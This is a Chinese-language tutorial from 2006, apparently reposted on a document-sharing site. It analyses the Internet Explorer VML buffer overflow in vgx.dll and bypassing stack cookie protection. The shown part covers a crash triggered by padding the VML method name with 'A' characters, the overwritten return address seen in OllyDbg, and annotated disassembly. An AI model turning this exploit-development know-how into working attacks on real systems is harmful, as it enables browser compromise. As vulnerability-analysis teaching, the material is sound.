ievml溢出分析过程和cookie保护绕过(教学)

《ievml溢出分析过程和cookie保护绕过(教学)》由会员上传分享，免费在线阅读，更多相关内容在行业资料-天天文库。

1、IEVML溢出分析过程和COOKIE保护的绕过(教学)[原创]IEVML溢出分析过程和COOKIE保护的绕过(教学)文章标题:[原创]IEVML溢出分析过程和COOKIE保护的绕过(教学)顶部ZV发布于:2006-09-2610:15[楼主][原创]IEVML溢出分析过程和COOKIE保护的绕过(教学)文章作者：zv(zvrop)（zvrop_at_163_dot_com）信息来源：邪恶八进制信息安全团队（www.eviloctal.com）注意：本文首发于邪恶八进制（http://forum.eviloctal.com）和网络技术论坛（http://bbs.nettf.n

2、et），转载请保留完整信息。一.写在前面的话本文是在无敌和病毒两人的强烈的求知欲要求下,我今天翘课半天来写.其实我也是觉得既然什么都已经公开了,也没意义再保留下去,遂写出此文,以慰看官.另外本人也是菜鸟,偶获一点心得,愿意和我一样的菜鸟们分享,高手就当指导的看吧.所以我不并吝啬自己的技术.在此我在此引用冰狐签名上的一句话告诉某些人:"别拿技术当宝贝."ps:本文所有注释是对下面一条代码的注释.ps:当然本篇不是溢出基础教程,需要一点点的汇编基础和溢出的基础.另外本文所说的也不是什么新鲜的技术,写出来是作为教程给初学者看的.ps:文章写的很初级,如果有错的地方,还请高手指正.

3、二.漏洞分析我准备把从头开始分析的过程完整的写下来,所以文章可能很臭很长,但是对初学者很有帮助.vml的这个漏洞,是没有检测缓冲区长度的一个漏洞,应该是偶然间用超过260字符的buff替代了method名字,IE报错,然后分析下去得出的利用办法.所以我们也用这种方式来探测漏洞.先用264(这个值在发掘漏洞的时候可以自己递增)个'A'填充vml页面的method名字.

4、AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"/>我们用调试器加载ie,这里我用的是ollydbg(以下简称od).开启这个页面,马上报警"不知该如何回避地址00410041,请更改eip重新执行",看来很明显,有返回地址被覆盖.在栈信息里也可以看到如下,此时e

5、sp的值为69450,69444,69448这两个地址原来的值是多少我们不知道.应该是被覆盖的返回地址.0006943C00410041iexplore.004100410006944000410041iexplore.004100410006944400410041iexplore.004100410006944800410041iexplore.00410041接着可以看到堆栈下面有:000694540009B00CUNICODE"AAAAAAAAAAA..."00069458000000000006945C0000000000069460659B8C10返回到659B

6、8C10来自659B3260看来溢出是发生在659b3260这个函数的调用函数上,在659b3260这个地址下硬件执行断点,用od查看内存发现这个地址就是在vgx.dll中,看来是基本上没错了.再次启动od,加载ie,访问这个页面,很快就断在这里.(其实如果你汇编比较牛逼,可以直接看代码分析,我是不行,所以用od的储蓄每一步的执行结果,然后分析的)下面开始枯燥的分析,希望不要睡着:func_659b3260{659B326051PUSHECX659B326153PUSHEBX659B326256PUSHESI659B326357PUSHEDI659B32648BF1MOVE

7、SI,ECX659B326633FFXOREDI,EDI659B32688BDAMOVEBX,EDX659B326A3BF7CMPESI,EDI659B326C0F84D1000000JEvgx.659B3343659B327266:393ECMPWORDPTRDS:[ESI],DI659B32750F84C8000000JEvgx.659B3343659B327B56PUSHESI//这个是获得字符串长度的函数,这里也就是返回'AAAA'在内存中的长度,单位为字,word,返回在eax中659B3